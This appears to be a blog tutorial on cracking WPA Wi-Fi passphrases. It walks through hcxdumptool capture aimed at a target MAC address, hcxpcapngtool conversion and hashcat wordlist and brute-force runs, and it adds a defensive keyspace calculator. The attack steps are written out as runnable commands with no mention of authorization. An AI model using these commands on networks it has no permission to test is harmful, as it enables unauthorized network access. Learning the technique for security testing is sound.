Preparation

  • Kali Linux operating system
  • A Wi-Fi dongle that supports monitor mode and packet injection. I’m using an Alfa AWUS036ACM, which works out of the box without any extra driver.
  • Running an unsupported dongle (like the TP-Link Archer Tx35U) may end up crashing the kernel.

Attack

Unlike the old method from the previous post, this time we use hcxdumptool to capture packets instead of airodump-ng.

Kali Linux should have it installed by default; if not, run sudo apt update && sudo apt install hcxtools, or compile from source.

1. Turn off services

sudo systemctl stop NetworkManager
sudo systemctl stop wpa_supplicant

These two services may interfere with the attack later; wpa_supplicant is the backend component of wireless networking.

2. Generate bpf file

The bpf file is what hcxdumptool uses to filter packets; the MAC addresses listed in it can be set to be either targeted or ignored.

You can first use airodump-ng to find the target's MAC address and channel number.

hcxdumptool --bpfc="wlan addr1 <mac_addr> or wlan addr2 <mac_addr> or wlan addr3 <mac_addr>" >> attack.bpf

To protect a given mac_addr instead:

hcxdumptool --bpfc="not wlan addr3 <mac_addr>" >> protect.bpf

This time we want to target one specific device, so we use attack.bpf.

3. Run hcxdumptool

sudo hcxdumptool -i wlan0 -c 11a --bpf=attack.bpf -w <output_name>.pcapng --rds=3
  • -i: specifies the interface name
  • -w: output file name
  • -c: channel number, followed by one character for the band:
band a: NL80211_BAND_2GHZ
band b: NL80211_BAND_5GHZ
band c: NL80211_BAND_6GHZ
band d: NL80211_BAND_60GHZ
band e: NL80211_BAND_S1GHZ (902 MHz)
  • --rds: how much information to display; check hcxdumptool -h for more (don't rely on the man page, it isn't up to date)

You should see something like this:

CHA|  LAST  |EA123P|   MAC-CL   |   MAC-AP   |ESSID          (SCAN:  2437/6)
---+--------+------+------------+------------+--------------------------------
  6|01:57:05|ep    |xxxxxxxxxxxx|xxxxxxxxxxxx|xxx

When you see a + under the 2, 3 and P columns of EA123P, you can stop; if unsure, let it run a bit longer to make sure all EAPOL frames / PMKID frames have been captured.

4. Convert file to hashcat format

hcxpcapngtool -o filename.hc22000 filename.pcapng

hcxpcapngtool will throw errors if:

  1. The capture was too short/incomplete.
  2. The format used is old/outdated.
  3. Too many DEAUTHENTICATION frames were detected.
  4. The capture file was cleaned.
  5. No PROBEREQUESTS were detected.
  6. Too few M1 frames were detected.

With warnings it may still be crackable, but if it says impossible then there is no way.

5. Crack

Same as the previous post: use whichever wordlist you like.

hashcat -m 22000 filename.hc22000 wordlist.txt

You can also use brute-force mode; for example, for the eight-digit home phone numbers that are very common in Taiwan:

hashcat -m 22000 filename.hc22000 -a 3 \?d\?d\?d\?d\?d\?d\?d\?d

(In my terminal I have to type \?d for it to be recognized as a command line argument; normally ?d is enough.)

  • -a: attack mode, 3 means brute-force
Built-in charsets
?l = abcdefghijklmnopqrstuvwxyz
?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
?d = 0123456789
?h = 0123456789abcdef
?H = 0123456789ABCDEF
?s = !"#$%&'()*+,-./:;<=>?@[]^_`{|}~
?a = ?l?u?d?s
?b = 0x00 - 0xff

Attack mode
0 = Straight
1 = Combination
3 = Brute-force
6 = Hybrid Wordlist + Mask
7 = Hybrid Mask + Wordlist
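To see why an eight-digit phone number is a poor WPA passphrase, it helps to compute how many candidates a mask actually describes. The following is an added example, not code from the original post or from hashcat: it parses a hashcat mask string using the built-in charset sizes above (hashcat's ?s has 33 characters, including the space and backslash that the rendering above drops, so ?a is 95) and returns the keyspace, plus the time an exhaustive run would take at a hash rate you supply. The hash rate used in the demo at the bottom is a made-up placeholder, not a measured number. Custom charsets (-1 .. -4) are supported through the optional custom mapping, which is my own addition for generality.

```python
"""Keyspace calculator for hashcat mask strings (added example, not from the post)."""
from __future__ import annotations

# Sizes of hashcat's built-in charsets. ?s is 33 characters in hashcat
# (space and backslash are part of it even though they are easy to lose
# when the table is rendered), so ?a = 26 + 26 + 10 + 33 = 95.
BUILTIN_CHARSETS = {
    "l": 26,   # a-z
    "u": 26,   # A-Z
    "d": 10,   # 0-9
    "h": 16,   # 0-9a-f
    "H": 16,   # 0-9A-F
    "s": 33,   # printable punctuation incl. space
    "a": 95,   # ?l?u?d?s
    "b": 256,  # 0x00-0xff
}


def mask_keyspace(mask: str, custom: dict[str, str] | None = None) -> int:
    """Return the number of candidates a hashcat mask describes.

    '?x' selects a built-in charset, '?1'..'?4' selects a custom charset
    given in `custom` (hypothetical helper argument standing in for -1..-4),
    '??' is a literal '?', and any other character is a fixed literal that
    contributes exactly one option.
    """
    custom = custom or {}
    total = 1
    i = 0
    while i < len(mask):
        if mask[i] != "?":
            i += 1            # literal character: one option, no growth
            continue
        if i + 1 >= len(mask):
            raise ValueError("dangling '?' at end of mask")
        sel = mask[i + 1]
        if sel == "?":
            pass              # escaped literal '?'
        elif sel in custom:
            total *= len(set(custom[sel]))
        elif sel in BUILTIN_CHARSETS:
            total *= BUILTIN_CHARSETS[sel]
        else:
            raise ValueError(f"unknown charset ?{sel}")
        i += 2
    return total


def seconds_to_exhaust(mask: str, hashes_per_second: float,
                       custom: dict[str, str] | None = None) -> float:
    """Worst-case wall-clock seconds to try every candidate of `mask`."""
    return mask_keyspace(mask, custom) / hashes_per_second


def compare_masks(masks: list[str], hashes_per_second: float) -> list[tuple[str, int, float]]:
    """Sort masks by keyspace so a policy reviewer can see the weak ones first."""
    rows = [(m, mask_keyspace(m), seconds_to_exhaust(m, hashes_per_second)) for m in masks]
    return sorted(rows, key=lambda r: r[1])


if __name__ == "__main__":
    # Assumed (constructed) rate for illustration only; measure your own
    # hardware with hashcat -b -m 22000 to get a real figure.
    ASSUMED_RATE = 1_000_000.0
    for mask, space, secs in compare_masks(
        ["?d?d?d?d?d?d?d?d", "?l?l?l?l?l?l?l?l", "?a?a?a?a?a?a?a?a?a?a?a?a"],
        ASSUMED_RATE,
    ):
        print(f"{mask:28s} keyspace={space:>24,d}  worst case={secs / 86400:,.2f} days")
```

The 8-digit mask from the post yields only 10^8 candidates, which is why a numeric home-phone passphrase falls to mode 22000 quickly on any modern GPU, whereas a long mixed mask grows far beyond what brute force can cover; compare_masks makes that gap visible when reviewing what passphrases an organisation allows on its access points.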